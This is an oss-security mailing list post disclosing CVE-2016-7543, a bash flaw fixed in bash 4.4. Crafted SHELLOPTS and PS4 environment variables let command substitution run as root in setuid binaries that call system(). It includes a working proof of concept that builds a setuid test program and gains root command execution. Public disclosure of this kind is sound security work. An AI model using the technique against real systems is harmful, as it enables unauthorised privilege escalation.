oss-security - CVE-2016-7543 -- bash SHELLOPTS+PS4

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <20160926174325.74454qfavcdb1uyo@webmail.alunos.dcc.fc.up.pt>
Date: Mon, 26 Sep 2016 17:43:25 +0200
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com
Subject: CVE-2016-7543 -- bash SHELLOPTS+PS4

The recent bash 4.4 patched an old attack vector regarding
specially crafted SHELLOPTS+PS4 environment variables
against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment,
closing a security hole involving PS4 expansion performing command
substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.